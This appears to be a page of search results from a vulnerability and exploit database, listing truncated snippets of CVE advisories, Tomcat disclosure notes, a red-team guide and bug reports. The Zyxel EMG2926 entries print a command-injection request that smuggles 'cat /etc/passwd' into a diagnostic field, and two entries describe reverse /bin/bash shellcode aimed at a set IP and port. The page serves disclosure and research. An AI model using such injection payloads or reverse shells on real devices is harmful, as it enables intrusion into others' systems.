7023 matches found
Wallarm Teams up with NGINX Plus to Provide Advanced Security
Wallarm is excited to be a pioneer security vendor in the NGINX Certified Module program and to provide trusted and verified security functionality to NGINX Plus customers. “We are pleased to announce that Wallarm is now part of the NGINX Plus Certified Module program with the Wallarm Next Generation WA...
Microsoft Windows PowerShell Security Feature Bypass Vulnerability (CVE-2017-0007)
Over the past few months, I have had the pleasure to work side-by-side with Matt Graeber (@mattifestation) and Casey Smith (@subtee) in their previous job roles, researching Device Guard user mode code integrity (UMCI) bypasses. If you aren't familiar with Device Guard, you can read more about it here:...
Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability
Exploit for hardware platform in category remote exploits Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh...
Zyxel / EMG2926 Command Injection
Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10124 AppleWebKit/537.36 KHTML, like Geck...
Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)
/ ; File name: reversebash.nasm ; Author: Jasmin Landry @JR0ch17 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 ; To change ; Shellcode length: 110 bytes ; Tested on Ubuntu 12.04.5 32-bit x86 ; Assemble reversebash.nasm file: nasm -f elf32 -o...
Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)
Linux/x86 - Reverse /bin/bash Shellcode (110 bytes). Shellcode exploit for Linux/x86 platform / ; File name: reversebash.nasm ; Author: Jasmin Landry @JR0ch17 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 ; To change ; Shellcode length: 110 bytes...
Apache Tomcat Reverse Proxy Information Disclosure Vulnerability (Mar 2017) - Linux
Apache Tomcat is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:apache:tomcat"...
Apache Tomcat Reverse Proxy Information Disclosure Vulnerability (Mar 2017) - Windows
Apache Tomcat is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:apache:tomcat"...
A Red Teamer’s guide to pivoting
Penetration testers often traverse logical network boundaries in order to gain access to a client’s critical infrastructure. Common scenarios include developing the attack into the internal network after successful perimeter breach o...
CVE-2017-6971
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862...
HatCloud - Tool for identify real IP of CloudFlare (Bypass CloudFlare)
HatCloud is built in Ruby. It bypasses CloudFlare to discover the real IP. This can be useful if you need to test your server and website, testing your protection against DDoS (Denial of Service) or DoS. CloudFlare is services and distributed domain name server services, sitting between the visitor a...
Apache Tomcat information disclosure Vulnerability, CVE-2016-8747-a vulnerability warning-the black bar safety net
Release time: 2017-3-13 20:05:14 GMT Importance: medium Affected versions: Apache Tomcat 9.0.0.M11 to 9.0.0.M15, Apache Tomcat 8.5.7 to 8.5.9 Description: A refactoring to make more extensive use of ByteBuffer introduced a regression that could cause the information on the same connection...
CVE-2016-8747
An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request...
Information disclosure
An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request...
CVE-2016-8747
The CVE-2016-8747 issue affects Apache Tomcat 8.5.7–8.5.9 and 9.0.0.M11–9.0.0.M15 in reverse-proxy configurations, where Http11InputBuffer.java can let a remote attacker read data belonging to a different request. The underlying problem is an information-disclosure vulnerability in the Tomcat rev...
Information Disclosure
tomcat-coyote is vulnerable to information disclosure. The vulnerability is caused by a regression introduced by a refactoring to widen the use of ByteBuffer. Due to the flaw, when running behind a reverse proxy, information leaks between requests on the same connection. All HTTP connecto...
GitLab: Gitlab.com is vulnerable to reverse tabnabbing via AsciiDoc links. (#3)
Dear GitLab bug bounty team, Summary --- Gitlab.com is vulnerable to reverse tabnabbing in AsciiDoc files. Why does this vulnerability exist? --- In AsciiDoc the following http://example.com[Reverse Tabnabbing^] is equivalent to Reverse Tabnabbing. How can this be exploited? --- Same scenario as...